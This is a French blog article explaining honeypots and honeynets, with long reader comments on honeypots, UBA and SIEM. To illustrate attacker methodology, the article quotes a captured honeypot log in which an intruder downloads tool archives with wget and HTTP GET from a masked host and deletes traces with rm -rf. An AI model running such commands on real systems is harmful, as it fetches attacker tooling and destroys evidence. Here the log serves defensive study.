On n’en entend pas souvent parler, mais les honeypots (pots de miel en français) sont des pièges à pirates qui remontent déjà d’il y a plus de dix années.

Un honeypot est un concept mis au point par des experts en sécurité informatique dont le but n’est pas d’empêcher les pirates d’entrer sur leurs systèmes, mais au contraire de les piéger lorsqu’ils viennent. Et donc d’étudier leur comportement pour mieux s’en protéger, en plus de leur restreindre l’accès à tout le système en production.

Ces mêmes honeypots ne sont pas utilisés et utilisables par n’importe qui dans le sens où ils impliquent un contact avec un attaquant réel et déterminé. Ce n’est pas le seul risque dû à leur utilisation, on en parlera plus tard.

Le but de cet article est d’aller plus loin que de juste présenter les honeypots, en observant un cas concret d’attaque repérée.

honeypot

Comment fonctionnent les honeypots ?

À la base, le but n’est pas d’attirer volontairement tous les pirates pour les prendre la main dans le sac, mais plutôt d’étudier leurs méthodes sur le terrain, en toute discrétion.

« Prendre un pirate la main dans le pot de miel »Cliquez pour tweeterPartager sur FacebookPartager sur LinkedIn

Le pot de miel doit ainsi être correctement configuré en fonction des attaquants à étudier. Une configuration trop simpliste laissera entrer les script-kiddies et autres logiciels automatisés. Tandis que les attaques plus ciblées dont la méthodologie est la plus intéressante demandent une configuration adaptée.

Un système volontairement vulnérable et ainsi placé dans un environnement contrôlé et surveillé en permanence. L’utilisation des honeypots demande des connaissances pointues non seulement pour analyser les attaques mais aussi pour gérer les problèmes techniques (configurations) et légaux.

Les pots de miel, un problème légal ?

Si l’on entend pas beaucoup parler de ces honeypots, c’est notamment car il y a un potentiel problème sur le plan juridique du fait de leur utilisation.

Effectivement, l’article 23 de la loi du 29 juillet 1881 sur la liberté de la presse nous dit que :

Seront punis comme complices d’une action qualifiée crime ou délit ceux qui, soit par des discours, […] soit par tout moyen de communication au public par voie électronique, auront directement provoqué l’auteur ou les auteurs à commettre ladite action, si la provocation a été suivie d’effet.

Ici, le fait de “provoquer à commettre une action” (le piratage) rend complice de cette action.

Il sera donc difficile de se plaindre d’un piratage dans le cas où l’on est complice de celui-ci.

Ce n’est pas le seul problème légal, car le honeypot récupère probablement des données à caractère personnel dont le traitement doit d’abord faire l’objet d’une déclaration à la CNIL.

Un cas concret d’attaque par Phishing

Les membres de l’association à but non lucratif The Honeynet Project partagent ce qu’ils ont appris sur les attaques repérées et étudiées sous la forme de rapports visibles à l’adresse suivante :

https://www.honeynet.org/papers

Par exemple, leur étude sur les attaques par Phishing révèle diverses techniques utilisées par les attaquants :

  • Utilisation d’adresses IP au lieu de noms de domaines
  • Utilisation de noms de domaines très similaires (le classique)
  • Tentative de compromettre le navigateur web pour faire apparaître une autre adresse URL
  • Manipuler le fichier hosts sur l’ordinateur de la victime pour faire pointer un nom de domaine vers une autre adresse IP
  • Utiliser un site malveillant comme proxy qui va récupérer les mots de passe entrés dans le formulaire puis les renvoyer vers le site réel
  • …etc

Autant d’informations que l’on connaît déjà et qui ne fonctionnent probablement plus (le rapport date un peu), mais qui peuvent aisément permettre de détecter d’autres techniques encore jamais vues auparavant.

La quantité massive d’information à traiter posant quelques problèmes, un script appelé honeysnap a été créé, dont le but est de faire ressortir rapidement les informations intéressantes sur les activités du pirate.

Un exemple a été placé à l’adresse suivante :

http://old.honeynet.org/papers/phishing/examples/honeysnap_sample1.txt

On y voit par exemple l’attaquant télécharger des archives contenant probablement des fichiers malveillants. On le voit également placer des archives dans le dossier temporaire du système sur lequel il est entré, et même supprimer des traces (les adresses IP et sites de l’attaquant ont été édités) :

25815 2004-08-02 20:22:53.337162 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/psy.tgz HTTP/1.0
27077 2004-08-02 20:37:13.767699 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/pico.tgz HTTP/1.0
[...]
[2004-08-02 19:11:41 10.2.1.146 26994 bash 0]w[BS]cd /var/tmp
[2004-08-02 19:11:42 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:12:04 10.2.1.146 26994 bash 0]c[BS]ww[BS]get XXX[BS].com/Arhv[BS]ive/[BS][BS][BS][BS][BS][BS]hive/socklist.tgz 
[2004-08-02 19:18:10 10.2.1.146 26994 bash 0]tar v
[...]
[2004-08-02 19:30:34  10.2.1.146 26994 bash 0]rm -rf *z
[2004-08-02 19:30:36  10.2.1.146 26994 bash 0]rm -rf p
[2004-08-02 19:30:38  10.2.1.146 26994 bash 0]rm -rf p.c

(NDLR: [BS] signifie “BackSpace”, l’attaquant appuie ainsi sur la touche “retour en arrière” pour se corriger)

Cet exemple nous permet ici de découvrir, grâce au honeypot, la méthodologie de l’attaquant une fois entré dans le système.

Du pot de miel au réseau de miel

Comme l’indique l’article dans la Revue de l’IT qui en parle :

“Pour rendre le piège plus discret, il est possible de créer un réseau de pots de miel ou honeynet”

Un honeynet (réseau de miel) est un ensemble d’honeypots. Le réseau en question n’étant pas un système en production, il n’y a aucune activité de base à part des activités potentiellement malveillantes initiées par des pirates.

Le but principal du honeynet est de récupérer des informations sur les menaces. Ces informations peuvent servir dans le milieu académique à des fins de recherches, ou au sein d’entreprises de sécurité pour créer des solutions antivirus efficaces ainsi que des signature pour les systèmes de détection d’intrusion.

Le mot de la fin

Je conclurai avec des pistes supplémentaires :

Il n’existe pas que des honeypots systèmes mais aussi des honeypots sur smartphones ainsi que divers projets entrepris dans le domaine.

Je vous laisse les liens :

Et vous, que pensez-vous des honeypots ? Bonne ou mauvaise idée ? N’hésitez pas à contribuer si vous avez quelque chose à ajouter 😉

16 Commentaires
Cliquez ici pour ajouter un commentaire

  • Bonjour,

    Article très intéressant comme toujours qui laisse la porte ouverte à une multitude de discussions sur le sujet 🙂

    Les Honeyspots sont très connus des services d’administration sécurité réseau. A vrai dire je crois que la grande majorité de ces attaquants savent déjà chez qui ils vont s’attaquer. Ils préféreront s’attaquer à des infrastructures réseau de petites tailles. Il faut savoir que les moyennes et grandes structures possèdent généralement toute une panoplie de système de sécurité en amont, le plus souvent virtualisée, pour justement cloisonner et centraliser leur logs (journaux d’événements etc.) sur des serveurs sécurisés isolés.

    Le “pirate” qui croit avoir effacer ses traces se trompent ! 🙂 Le but de ce type d’analyse comportemental est de détecter en amont ce genre d’intrusion pour ensuite la juguler en interne.

    Dans l’exemple qui a été donné ici, il faut comprendre que de telle requête du style “HTTP GET /Arhive/pico.tgz HTTP/1.0” a forcément été initié et autorisé volontairement par l’Administrateur Systèmes et réseau de l’infrastructure, car nous savons que l’accès par le biais d’un interface style WebREST en HTTP ne peut en réalité se faire quà partir d’une session ayant les droits requis sur un port d’écoute bien spécifique en interne puisqu’elle est d’office verrouillée côté WAN vers LAN (pour faire simple). De plus l’intégration d’un moteur de recherche et d’indexation en interne sur ce genre de configuration génère automatiquement des alertes fonction de règles préétablies via un pare feu physyque (type Juniper ou autre) couplé à des serveurs dédiés du style Negios ou Graylog fonctionnant sur la pile “ELK”.

    Le niveau de sécurité et de puissance du socle matériel et logiciel de telle infrastructure est aujourd’hui suffisant pour absorber toute charge d’attaque malveillante et exécuter des réponses appropriées…

    Malheureusement il existe un grand nombre d’infrastructure en France notamment qui n’ont pas pris la mesure de l’enjeu sécurité pour des raisons économiques et financières, et souvent par négligence…

    Le gros souci aujourd’hui est l’activité d’infogérance qui s’est auto proclamée “Reine” de la supervision réseau, du Support et de la Sécurité. Ce qui a pour effet de faire croire à leurs clients que tout va bien, “on gère”! Oh que non !! 🙂

    Répondre
    • Merci Diki ! C’est très bien dit. Effectivement le pirate pourra y effectuer des actions qui ne sont en théorie pas faisables, l’idée étant bien de détecter et d’analyser un comportement précis. En l’occurrence ici il s’agit d’observer ses méthodes une fois entré dans le système.

      Répondre
      • Bonjour Michel,

        Sur le ton de l’humour j’ai une anecdote à partager au sujet du “comportemental” 🙂

        Sans rentrer dans le détails de l’affaire, un beau matin j’arrive à mon poste tout content pour enfin démarrer une phase de test d’un projet pilote tournant autour d’un centralisateur de logs que j’avais mis en place au terme d’un effort harassant ! 🙂

        Un nouveau support (Infogérance) avait pris la main au 1er janvier 2016 sur cette infrastructure réseau.

        Quelle fut ma surprise ! J’ai pu détecter à la volée (logs) des demandes de connexion en échec sur certains serveurs. Bingo ! C’était un technicien de ce Support qui tentait de se connecter en vain 🙂

        Le truc c’est qu’il n’avait pas à se connecter puisque toute activité de support doit suivre une procédure bien précise (sécurité oblige).

        En réalité, c’est la “curiosité viscérale” de ce technicien qui était la source de cette “anomalie”. Nous revenons toujours à ce fameux facteur humain qui est très souvent à l’origine de beaucoup de problèmes de sécurité… Par nature, l’humain cherchera à s’aventurer toujours plus loin dans le but de défier les lois imposées par l’Homme… ! 🙂

        En conclusion, la première priorité d’une Administration Sécurité Systèmes et Réseau est de protéger et sécuriser son infrastructure de tout acte malveillant ou accidentel provenant de l’intérieur…

        Répondre
  • Faut-il faire appel à l’intelligence artificielle pour faire face au facteur humain dans la sécurité informatique ? Que peut-on déléguer comme responsabilité à l’humain tant qu’il ne sait pas respecter une éthique? L’intelligence artificielle développera-t-elle la curiosité viscérale qui devient perversion quand elle agit par rapport à des motivations affectives: volonté de domination, de défier , d’exhiber…

    Répondre
    • Eh bien je pense que c’est un très bon débat ! L’intelligence artificielle est aussi questionable, et la comparer au facteur humain semble être un sujet d’avenir très intéressant.

      Répondre
  • Les honeyspot, ce ne sont pas les internautes lambda qui savent de quoi il s’agit. Et c’est tant mieux ainsi puisque c’est un process réservé aux professionnels. Je suis juste étonné de découvrir que la loi puisse qualifier de complicité le fait de piéger le pirate. Et autre chose, il y avait déjà des appareils électroniques en 1881 ?

    Répondre
  • tiens tu le connais celui ci : https://github.com/dtag-dev-sec/tpotce

    Répondre
  • Bonjour,magnifique,j avais vu dans MR Robot le honey pot mais j avais rien compris la superbe explication merci Michel et Diki.Sa me semble necessaire et efficace ,la loi est a remettre a jour sur ce genre de cas et je pense penalement difficilement condanable on est plus sur un flou juridique pour le honey pot .

    Répondre
  • très bonne journée a vous ainsi cas michel et diki très bien analyser de leurs part très bien expliquer comme toujours.
    présentation historique. le concept de honeypot a été évoqué pour la première fois dans les années 1990.

    dans le livre de l’ancien astronome clifford stoll intitulé the cuckoo’s egg. dans ce livre il montre comment il a crée un honeypot.
    de fortune le permettant de surveiller les intrusions. dans le réseau du laboratoire lawrence berkeley.l’idée lui est venue en

    remarquant plusieurs erreurs de comptabilité. causée par une intrusion dans le système informatique du labo.
    en tant qu’administrateur réseau du laboratoire. mr clifford stoll avait accès à quasiment tout le système.

    a partir d’une machine piégée fournissant de fausses données à l’intrus clifford. arrive à le garder suffisamment longtemps
    en ligne pour pouvoir l’identifier et alerter la police. c’est de là que vient l’idée de honeypot ou pot de miel.

    le 7 janvier 1991 bill cheswick implante et déploie le premier honeypot. au sien des laboratoires de la division de recherche
    informatique et scientifique de at&t american téléphone & télégraphe. actuellement le domaine des honeypot se rue vers des

    projets plus complexes. comme le honeynet projet qui se développe d’une manière très rapide. depuis sa première apparition
    en 1999. et qui est actuellement installé au niveau de plus d’une vingtaines de projets distribués sur plus d’une quinzaines.

    de pays du monde. en 2004 des honeypots virtuels ont été introduits permettant à plusieurs honeypots de fonctionner
    sur un seul serveur. définition 1 un honeypot est une ressource de l’architecture de sécurité dont le but est de se faire passer.

    pour une cible réelle afin d’être sondée attaquée ou compromise. autrement dit les honeypots sont des machines de production
    destinées à attirer les pirates. ceux-ci persuadés d’avoir pénétré le réseau ont tous leurs faites et gestes.

    surveillés. définition 2 dans le jargon de la sécurité informatique un honeypot en français pot de miel est une méthode de défense.
    active qui consiste à attirer. sur des ressources serveur programme service des adversaires déclarés ou potentiels.

    afin de les identifier et éventuellement de les neutraliser. intégration du honeypot dans la politique de sécurité du système
    d’information. la sécurité des réseaux informatiques devient un problème des lors qu’on se connecte à internet.

    que ce soit par le biais d’un réseau d’entreprise ou par son fai. il faut alors faire face aux tentatives d’intrusion.
    au déni de service aux vers aux virus. des contre -mesure ont été crée pour détecter les attaques ou les éviter. ces systèmes

    sont basés sur des choses connues technique d’attaques failles etc. afin de mieux combattre les attaquants.
    il faut apprendre à les connaître quelles sont leurs habitudes quels outils utilise ils que recherche ils.

    si de tels facteurs sont connus les contre- mesures pourront être plus efficaces et de nombreuses attaques évitées.
    la politique de sécurité met en place des mécanismes permettant de garantir des services en termes d’intégrité.

    de confidentialité d’authentification d’identification. de disponibilité et de contrôle d’accès. la spécificité du honeypot
    réside dans le fait que le système est volontairement présenté comme non sécurisé mais capable de retenir l’attention

    d’une personne mal intentionnée. le principe les types de honeypot selon sont but principal les honeypots
    peuvent être divisés en deux catégories. distinctes honeypot de production et honeypot de recherche.

    un honeypot de production est utilisé pour sécuriser un réseau opérationnel il déroute les attaques orientées vers les différents
    services de production du système. en les attirant vers lui. ce qui permet de réduire le risque en renforçant la sécurité.

    qui est assurée par les autres mécanismes de sécurité comme les firewall les ids système de détection d’intrusions.
    etc comme il peut aussi détecter des attaques grâce à ses fichiers d’audit qui peuvent être aussi utilisés pour corriger les

    vulnérabilités. le but des honeypots de production est d’émuler de vraie systèmes de production permettant aux pirates
    de dépenser du temps mais aussi des ressources afin d’étudier la manière dont ils exploite les vulnérabilités.

    dans les environnements de production. les honeypots de production émulent principalement des services spécifiques
    et parfois des systèmes d’exploitation. pour attirer des attaquants ils peuvent également émuler différentes backdoors

    virus et trojans. par exemple pour examiner les attaques sur les serveurs web. un honeypot de production émulant
    un serveur web et des faux services peuvent être déployés.un honeypot de production joue un rôle important dans une ou

    plusieurs composantes de la sécurité du système de production telles que la prévention la détection la réaction.

    Répondre
  • Alexandre “NSK”
    23 décembre 2021 18 h 20 min

    un des meilleurs projets a l’heure actuelle je l’utilise perso sois en VM ou SUR le cloud AWS : https://github.com/telekom-security/tpotce

    Répondre
  • très bonne soirée michel est très bonne fête a toi super ton sujet sur les pot de miels. est bravos à diki . pour sont
    commentaire très bien fait de sa part. pourquoi un honeypot n’est pas une solution de sécurité complète ?

    un principe clé et peut être un des enseignement les plus importants en matière de sécurité. que doit retenir tout
    professionnel est qu’il faut toujours conserver une trace d’audit. pourquoi? parce que si vous être confronté à une fuite

    de données. vous saurez au moins répondre aux question quoi où et quand. en plus certaines lois et réglementation
    exigent de mettre en place des trace d’audit. pour facilité la chose il existe une palette d’outils. aidant à surveiller

    les appareils systèmes applications et journaux. étant donné que ces outils surveillent les réseaux 24/24 et7jours/7
    ils génère chaque jours plusieurs milliers d’entrées. qui noient souvent les administrateurs sous les données.

    au delà des domaines de données il y a les alertes qui émettent des signaux d’alarme.et submergent les boîtes aux lettres
    de notification de gestion des événements et informations de sécurité siem. et de détection des intrusions.

    je me demande si les arbres n’empêcherait pas de voir la forêt. oui ces outils ont joué leur rôle.
    trouver ceci cela et encore autre chose déclencher une alerte mais face au déluge d’alertes.

    il est difficile de déterminer ce qui mérite d’être examiné de prés. s’il est important de tout étudier alors rien n”a d’importance.
    c’est la raison pour laquelle les honeypots sont devenus des outils de sécurité aussi appréciés. et que par certains aspects

    ils comble les lacunes de vos outils de surveillance. qu’est ce qu’un honeypot ? un honeypot est essentiellement
    un appât mots de passe vulnérabilités fausses données sensibles. que l’on s’efforce de rendre très tentant et accessible.

    l’objectif est de tromper et d’attirer un hacker essayant d’accéder de manière non autorisée à votre réseau.
    le honeypot est surveillé par l’équipe de sécurité informatique. toute personne surprise la main dans le pot de miel

    et souvent supposée être un intrus. les avantages du honeypot. avant d’expliquer pourquoi un honeypot
    ne doit pas être la seule solution de sécurité de votre organisation. indiquons quelques raisons pour lesquelles il constitue

    vraiment une mesure de sécurité informatique très efficace. en particulier pour en savoir plus sur qui rôde
    dans votre environnement . avec un honeypot vous pouvez savoir comment un hacker a pénétré dans le système.

    à partir d’où par exemple adresse ip d’origine et de destination des données volées quels éléments on été supprimés.
    ou ajoutés par exemple le hacker a augmenté ses droit pour passer admin. les frappes au clavier d’une personne.

    et quel programme malveillant est utilisé par exemple un cheval de troie ou un rootkit ajouté au système.
    les alertes qui méritent une enquête comme mentionné précédemment le service informatique est souvent

    bombardé de milliers d’alertes par jour sans qu’il ne soit fait de distinction ou alors très peu.
    entre les risques et menaces de faible et haut niveau. de leur côté les honeypots n’enregistrent que quelques

    centaines d’événements dans le journal facilitant ainsi le travail de l’informatique. chargé de gérer analyser et
    agir rapidement puis de chasser l’intrus avant qu’il ne fasse d’autres dommages. concernant les alertes du honeypot

    prenez garde aux différents types de faux positifs. par exemple un hacker peut créer une diversion faisant croire
    que ce sont vos systèmes de production qui attaque le honeypot. votre honeypot détecterait ces fausses attaques et

    inciterait vos administrateurs informatiques. à enquêter sur elles c’est à dire sur les attaques prétendument lancées .
    par votre système de production et utilisant votre honeypot. pendant que cette fausse alerte est traitée.

    le hacker peut se consacrer à la véritable attaque oui les hackers sont malins.!

    alternative pour lutter contre les ransomware si vous ne posséder pas de système automatisé de surveillance des fichiers
    vous pouvez créer un honeypot contenant de faux fichiers et dossiers et le surveiller régulièrement.

    comme alternative pour lutter contre les ransomawre pourquoi ne pas essayer une des solution.de surveillance de fichiers
    basée sur powershell développée en interne. ? bien entendu vous devrez mettre en place un audit natif du système

    de fichiers. notez que cela induira une surcharge importante pour votre système. à la place vous pouvez envisager
    de faire ceci prioriser et créer un partage de fichiers accessible contenant des fichiers en apparence normaux ou avec de

    la valeurs. mais qui en réalité sont faux. étant donné qu’aucune activité utilisateurs légitime ne devrait en théorie
    être associée à un partage de fichiers servant de honeypot il y a plus de chance que toute activité observée soit due

    à un intrus et doit être traitée en tant qu’alerte de haut niveau. une fois que vous avez activé l’audit natif pour enregistrer.
    les activité d’accès vous pouvez créer un script permettant d’alerter l’informatique lorsque des événements sont écrit

    dans le journal des événements de sécurité. par exemple en utilisant dumpel.exe. détecter potentiellement des menaces
    internes oui on part souvent du principe que toute interaction avec un honeypot signifie que vous êtes un hacker.

    après tout personne n’a aucune raison d’y aller. selon la configuration le simple fait que vos employés déclenchent
    les alertes ne signifie pas automatiquement. qu’ils sont coupables. au niveau juridique les utilisateurs pourrait avancer
    que leurs employeur a enfreint leur vie privée car il ne leur a pas donné le droit de supprimer leurs données personnelles.

    dans le honeypot faites confiance mais vérifiez. dans un prochain sujet michel de dirait pourquoi les honeypot sont
    pas la solution de sécurité complète.

    Répondre
  • très bonne fête à toi michel. pour en finir avec les honeypots voici pourquoi il sont pas la panacée?
    d’un autre côté derrière le pare-feu l’adresse ip et les données d’identification de compte de l’entreprise permettent

    difficilement de localiser les personnes internes. mécontentes et/ ou malveillantes. pourquoi ?
    une personne interne n’en viendrait peut être jamais à utiliser ou interagir. avec le honeypot . celui-ci présenterait alors

    peu d’intérêt comme outil de recherche. de la même façon le honeypot ne fonctionnera pas si la personne interne
    est au courant de son existence ou si elle le découvre. d’une façon ou d’une autre elle saura comment l’éviter et par

    conséquent ne déclenchera ni activité ni journalisation. données déchiffrées les organisations commencent à chiffrer
    leurs données. après tout le chiffrement figure parmi les meilleurs pratiques et est dans certains cas une exigence.

    de conformité mais les technologies qui protègent nos données comme c’est le cas du chiffrement. ne peuvent pas
    nous dire ce qui se passe sur nos réseaux. c’est là que les honeypots sont utiles. ils détecteront l’activité car ils agisse

    entant que point terminaux sur lesquels l’activité et déchiffrée. mais les honeypots ne sont pas la panacée
    à la place essayer la sécurité dés la conception. comme les tests de pénétration les honeypots son l’opposé de la sécurité

    dés la conception. afin de disposer de davantage d’informations sur l’environnement de votre organisation.utilisateur
    les honeypots sont souvent installés une fois que le système est prêt. intégrer des machines qui vous indique où

    vous êtes vulnérable est une expérience très riche. une méthode plus proactive pour réduire les risques et améliorer
    la sécurité consiste à procéder à des tests. avant de publier un produit ou un nouvel environnement informatique.

    soyez aussi exigeant avec votre environnement informatique. qu’avec vos ampoules les aliments que vous consommez
    et les bâtiments. c’est ce sur quoi la sécurité dés la conception met l’accent. intégrer la sécurité à tous les niveaux

    du processus de gestion informatique dés le tout début de la phase de conception.

    l’uba un moyen plus efficace de détecter les menaces internes et externes et le ransomware. lorsqu’une personne
    de l’extérieur pénètre sur le réseau par les ports publics légitimes. e-mail web données d’identification.

    puis obtient un accès entant qu’utilisateur elle dispose de moyens très habiles de mettre en pratique une attaque qui
    sera difficile à surveiller. en fait pour un administrateur informatique qui se contente de surveiller l’activité du système

    le hacker a toute l’apparence d’un utilisateur quelconque. c’est là que l’analyse ou comportement des utilisateurs
    uba peut s’avérer très utile. voire plus qu’un honeypot ! l’uba obtient. vraiment d’excellents résultats lorsqu’il s’agit

    de gérer l’inconnu.en arrière plan le moteur uba peut déterminer les caractéristiques fondamentales de l’activité de
    chaque utilisateur puis localier les écarts et les signaler en temps réel. quelle que soit la forme sous laquelle ils se cache une

    personne de l’extérieur? une menace venant de l’intérieur ! un ransomware ? tous seront détectés. un administrateur
    informatique peut par exemple configurer une règle. permettant d’identifier des milliers d’actions. modifier fichier

    en un court laps de temps. responsable des dommages en cas de détournement de votre honeypot oui vous vous attendez
    à ce qu’un honeypot soit inspecté et attaqué mais vous devez aussi envisager qu’il puisse être utilisé. toutefois certains

    honeypots entraînent un risque très faible . comme c’est le cas des honeypots à faible interaction. ils sont faciles à installer
    et sont dépourvus de tout système. d’exploitation susceptible d’être exploité par un hacker pour effectuer ses opérations

    ils sont en grande partie inactifs et attendent qu’une activité quelle qu’elle soit se produise. ils capture très peu
    d’informations se contentant de vous alerter lorsque. quelqu’un y accède et qu’il est peut être pertinent d’observer.

    l’activité qui s’y déroule. un honeypot à interaction les élevées est bien plus risqué. véritable système d’exploitation
    il possède des services programmes et e-mails et fonctionne comme un véritable ordinateur. il est également plus

    compliqué à installer et à déployer. et il exige d’être positionné de manière stratégique.soit il pourrait
    exposer votre réseau tout entier à des risques. plus importants soit personne ne le verrait. ce pendant votre honeypot

    à haut risque capture aussi plus d’informations l’adresse ip dans certains cas le nom de l’individu le type d’attaque et surtout
    il permet de savoir comment mieux protéger. votre réseau n’oublier pas qu’au lieu d’éviter d’être détecté un hacker

    peut également fournir de fausses informations. au honeypot incitant ainsi la communauté de sécurité à porter des jugements.erronés et à tirer des conclusions incorrectes le concernant. revenons au détournement. vous vous retrouverez

    avec un problème sérieux sur les bras. si un honeypot est détourné et utilisé pour attaquer infiltrer et endommager
    d’autres systèmes et organisations. votre organisations pourrait être considérée comme responsable.

    en aval des dommages vous aurez été prévenu. réfléchissez attentivement à la façon dont vous mettez en oeuvre
    vos honeypots et choisissez vos solutions de sécurité. intelligemment. les honeypots ne constituent pas une bonne

    alternative si ce dont vous avez vraiment besoin est un système d’analyse du comportement des utilisateurs.
    par contre les honeypots sont utiles puisqu’il travaille avec les solutions de sécurité en place.

    Répondre
  • très bonne soirée michel dans un commentaire je parler de l’uba . et tu na dit que tu connaissais pas auparavant .
    donc ici je te donne le petit sujet que voici. cela peut te servir par la suite . donc ici je fait simple car le sujet

    peut être très long ? qu’est -ce que l’uba ou analyse du comportement des utilisateurs ?
    il n’y a rien de nouveau à utiliser l’analyse pour la protection des données ou la prévention contre le piratages.

    les pare-feu par exemple analysent le contenu des paquets et d’autres métadonnées. telles que les adresse ip
    afin de détecter et empêcher les logiciels malveillants d’entrer. et les logiciels antivirus analysent en permanence

    les systèmes de fichiers en y recherchant des logiciels malveillants. détectés au moyen de fragments de code
    et d’autres signes d’infection.

    qu’est-ce que l’uba

    à la différence des pare-feu et des logiciels antivirus. l’analyse du comportement des utilisateurs user behavior
    analytics ou uba porte essentiellement sur ce que fait l’utilisateur. applications lancées

    activité du réseau et de manière particulièrement critique fichiers consultés quant un fichier ou un e-mail
    a été touché qui l’a touché les opérations effectuées et leur fréquence.

    la technologie uba détecte les modèles d’utilisation indiquant un comportement inhabituel ou anormal.
    indépendamment du fait que ces activités proviennent d’un pirate externe ou interne.

    d’un logiciel malveillant ou d’un autre processus. alors que l’uba n’empêchera pas des pirates externes ou internes
    d’entrer dans votre système elle peut rapidement détecter leurs agissements et minimiser les dommages.

    oui l’uba est un parent proche de la siem security and information event management.
    gestion des informations et événements de sécurité. la siem a traditionnellement mis l’accent sur l’analyse

    des événements recensés dans les par-feu les systèmes d’exploitation et autres journaux système afin de détecter
    des corrélations intéressantes. habituellement au moyen de règles prédéfinies. par exemple plusieurs échecs

    d’ouverture de session dans un journal pourrait être mis en correspondance avec l’accroissement de trafic réseau
    sortant enregistré dans un autre journal. la siem pourrait décider que c’est le signe de pirates entrant dans le système.

    et enlevant des données car nous le verrons bientôt en portant l’attention. sur les système de périmètre.
    et les journaux du système d’exploitation. au lieu de surveiller les données elles-mêmes qu’il est facile de manquer des

    pirates. internes abusant de leurs droits d’accès ainsi que l’activité de pirates externes. parce que ces derniers
    sont devenus très doués pour ressembler à des utilisateurs ordinaires. une fois à l’intérieur.

    c’est là où l’uba entre en scène. en se concentrant moins sur les événements système. et plus sur les activités
    spécifiques des utilisateurs l’uba peut apprendre les modèles de comportement des utilisateurs.

    et repérer les pirates lorsque leur comportement diffère de celui des utilisateurs légitimes. sur ceux michel

    je te laisse et te souhaite une bonne nuit je ferait un autre commentaire sur le sujet car comme je les dit

    le sujet risque d’être très long pour bien le comprendre.

    Répondre
  • salut michel pour un peut plus de détail voici un commentaire très intéressante pour les administrateur.
    finalement un pot de miel correspond donc à l’émulation d’un système d’exploitation d’un service ou enfin d’un simple

    logiciel vulnérable. a partir de ces deux définitions on peut déduire les principales caractéristiques. d’un pot de miel
    un honeypot est un système qui n’a aucune valeur métier/ business en terme de production.

    l’ensemble des communications relatives aux honeypots. peut être considéré comme étant malveillant
    un honeypot cherchant à se connecter à une autre ressource est probablement compromis

    et il n’y a aucune raison qu’un utilisateur légitime agisse avec ce système ou ce service.
    un honeypot est à la fois un trompe- l’oeil et un piège pour les attaquants. ces derniers perdent leur temps en s’y attaquant

    et leur actions sont minutieusement épiées. il nous est déjà arrivé lors d’une mission de test d’intrusion de tomber
    sur un honeypot et que le rssi se réjouisse et se félicite lors de la soutenance de nous avoir fait perdre quelques minutes.

    un honeypot ne peut pas empêcher une attaque comme le pourrait un ips ou un firewall.
    cependant ce type d’outil permet de la détecter ainsi que de détecter ses principales caractéristiques.

    cible origine technique d’exploitation utilisées. un pot de miel devrait donc dans l’idéal être utilisé de manière
    conjointe avec un pare-feu ou un ids de manière à protéger ou plutôt alerter de la possible malveillance interne.

    il existe un très grand nombre de stratégies pour mettre en place un honeypot. celles-ci vont de l’installation
    bête et méchante d’une version volontairement vulnérable d’un logiciel sur un serveur normalement inutilisé.

    jusqu’à l’installation de logiciels plus ou moins complexes. permettant de simuler le comportement d’autres logiciels
    vulnérables. on peut en effet piéger un attaquant potentiel en l’attirant sur un système dont on sait que les employés.

    ne l’utilisent pas. dés lors l’utilisation de ce système pourra être un indicateur de la présence d’un pirate au sein
    du système d’information.

    il est donc important de comprendre que la vulnérabilité. n’est pas forcement présente puisque l’honeypot n’est potentiellement. pas composé du logiciel vulnérable d’origine.

    de plus l’objectif lors de la mise en place d’un honeypot n’est pas de voir son système compromis pour de vrai
    dans les minutes suivant son démarrage. mais bien d’être en mesure de remonter des alertes dans le temps.

    où placer son honeypot ? il est important d’évoquer la problématique du placement du pot de miel.
    au sein du système d’information de l’entreprise. afin d’être en mesure de valoriser les remontées

    il est préférable de le placer dans un environnement correspondant à l’objectif recherché.
    par exemple si l’on veut identifier les postes de travail compromis sur lesquels les pirates ont installé

    des bots malveillants. s’attaquant aux autres postes. ou si il est préférable de placer le pot de miel
    au milieu même du lan et non pas dans la dmz ou en frontal sur internet. pour identifier une tentative d’attaque

    il sera au contraire préférable de le placer au sein de la dmz. depuis laquelle un potentiel attaquant pourrait provenir.

    concrètement les honeypots que l’on retrouve le plus couramment prennent la forme d’un logiciel installé sur un
    système inutilisé par les employés de l’entreprise. il permet donc simplement de relever les traces de tentative

    de connexion. et les actions qui ont été réalisées.

    les différents types d’honeypots

    en fonction du type d’honeypot celui-ci est capable d’interagir à un degré plus ou moins élevé avec l’attaquant
    on distingue en effet les pots de miel en au moins deux catégories.

    les low- interaction honeypots et les high – interaction honeyppots. de même qu’il existe des honeypots imitant
    le comportement de serveurs vulnérables. il existe aussi des logiciels reproduisant le comportement

    de clients vulnérables.

    high- interaction honeypots vs low- interaction honeypot contrairement aux high – interaction honeypots
    les low- interaction honeypots. ne son pas capables de reproduire parfaitement le comportement

    d’un logiciel ou d’un serveur. cela limite donc considérablement la capacité d’un pirate à exploiter une faille
    et donc celle d’un analyste à étudier le comportement de l’attaquant. en effet si le logiciel utilisé permet

    uniquement de détecter l’exploitation de la faille il ne sera par exemple pas possible de voir quelles sont
    les commandes exécutées par le pirate après avoir obtenu un accès au système.

    dans le cas d’un honeypot de type low- interaction le serveur ne supporte pas l’intégralité des spécifications
    du protocole. et donc les fonctionnalités offertes par le logiciel. un pirate est donc potentiellement en mesure

    de découvrir la supercherie. dans tous les cas il ne sera pas possible d’obtenir des traces sur l’ensemble de l’attaque.
    à l’inverse un high – interaction honeypot sera capable de reproduire fidèlement les spécifications.

    d’un logiciel vulnérable. par exemple un pirate sera en mesure d’interagir avec le serveur.

    server – side honeypot vs client – side honeypot la simple différence entre les honeypots de type
    server- side et ceux de type client- side est le type du logiciel ciblé.

    les pot de miel de type server – side regroupent tous les logiciels simulant des serveurs et exposant des service
    sur le réseau local ou sur internet. inversement les pots de miel type client- side regroupent les logiciels

    n’exposant pas de service et requérant donc de la part du pirate un certain niveau d’interaction avec un utilisateur
    pour mener à bien une attaque.

    parmi ces logiciels on retrouve bien entendu les navigateur web.

    autres type d’honeypot

    il existe d’autres types d’honeypots. thug bluepot ou encore ghost en sont des parfaits exemples.
    en effet thug permet de simuler le comportement d’un navigateur web visitant une page web malveillante

    ou pas le navigateur et la version utilisés sont bien entendu paramétrables par l’analyste.
    un tel outil permet d’identifier rapidement les navigateurs ciblés par les attaquants ayant mis en ligne le site.

    ou la page malveillante. pour cela thug va récursivement télécharger et exécuter le code html / java script
